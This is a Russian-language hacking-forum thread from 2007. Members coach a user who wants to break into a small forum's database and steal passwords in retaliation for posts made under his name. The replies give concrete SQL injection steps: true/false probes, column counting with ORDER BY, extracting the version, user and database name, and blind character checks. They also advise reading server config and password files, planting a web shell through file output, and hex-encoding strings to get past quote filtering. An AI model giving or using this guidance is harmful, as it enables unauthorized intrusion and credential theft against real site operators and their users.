12.11.2007, 01:40
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
сначала проверь саму sql-inj
https://www.server.ru/dir/index.php?do=viewinforum&cid=0&p=[реальный индекс]+and+1=1/*
данные выведутся
https://www.server.ru/dir/index.php?do=viewinforum&cid=0&p=[реальный индекс]+and+1=2/*
не выведутся
потом подбери количество столбцов
https://www.server.ru/dir/index.php?do=viewinforum&cid=0&p=[реальный индекс]+order+by+[number]/*
ну а потом проверь версию и тд
все можно вывести в одном столбце CONCAT_WS(0x3A,VERSION(),USER(),DATABASE())
з.ы. если не пройдут юнионы проверь через условие версию and+(ascii(substring(VERSION(),1,1))=51)
з.з.ы вместо [что-то] надо подставить данные
з.з.з.ы. это не алгоритм а лишь один из вариантов дальнейших действий |
|
|
12.11.2007, 01:46
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
да и вобще, это MySQL, а не MSSql который та пытаешься пользовать, даже в сообщении об ошибках это видно
__________________
Карфаген должен быть разрушен...
|
|
|
|
12.11.2007, 02:10
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
Провел на форуме:
60954
Репутация:
3
|
|
https://www.server.ru/dir/index.php?do=viewinforum&cid=0&p=[реальный индекс]+and+1=2/*
halkfild, даже при этом данные выводятся  Блин, да что ж такое!
Дело такое: ссылку дать не могу, поскольку использую для входа свой логин и пароль. Это типа мини-форум, на котором меня круто #@!&, написали от моего лица не совсем приличное! Единственный выход проникнуть в базу, узнать пароли. Сам я MySQL не знаю (только MSSQL  ). halkfild, посоветуй, что нибудь ещё, очень прошу!
|
|
|
|
12.11.2007, 15:10
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от Derec
halkfild, даже при этом данные выводятся :( Блин, да что ж такое!
Дело такое: ссылку дать не могу, поскольку использую для входа свой логин и пароль. Это типа мини-форум, на котором меня круто #@!&, написали от моего лица не совсем приличное! Единственный выход проникнуть в базу, узнать пароли. Сам я MySQL не знаю (только MSSQL :rolleyes: ). halkfild, посоветуй, что нибудь ещё, очень прошу!
Понимаешь в чем беда, тут вариантов масса...
Кстати попробуй закрыть кавычкой [реальный индекс]...
Или кинь ссылку тогда в личку чтоле если так боишся выкладывать...
PS это не "единственный выход" еще как вариант набить морду тому кто это сделал :))
__________________
Кто я?..
|
|
|
|
12.11.2007, 17:54
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900
Репутация:
138
|
|
Да он давал уже ссылку. Вроде там ниче не сделать
|
|
|
|
13.11.2007, 02:27
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
попробуй прочитать .httpdconfig в нем можно найти пути до .htpasswd или до виртуал хоста.. в etc\passwd паролей нет впринципе
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
13.11.2007, 02:42
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633
Репутация:
3
|
|
Сообщение от Constantine
попробуй прочитать .httpdconfig в нем можно найти пути до .htpasswd или до виртуал хоста.. в etc\passwd паролей нет впринципе
а в какой папке его можно искать?
/conf/.httpdconfig
/.httpdconfig
/etc/.httpdconfig нет
|
|
|
|
13.11.2007, 02:43
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
поищи раскрытие путей на сайте что бы получить полный путь..
попробуй почитать конфигы форума, сайта
так же конфигы http://forum.antichat.ru/thread49775.html /*тут они относительные, переделай под полныйпуть*/
з.ы. попробуй вывод в файл, сделай себе шелл, если есть права на запись в директорию
|
|
|
|
13.11.2007, 02:54
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633
Репутация:
3
|
|
Спасибо, буду пробовать пути 
шелл не получится - кавычки нельзя использовать |
|
|
|
13.11.2007, 02:56
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
fervex используй хекс
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
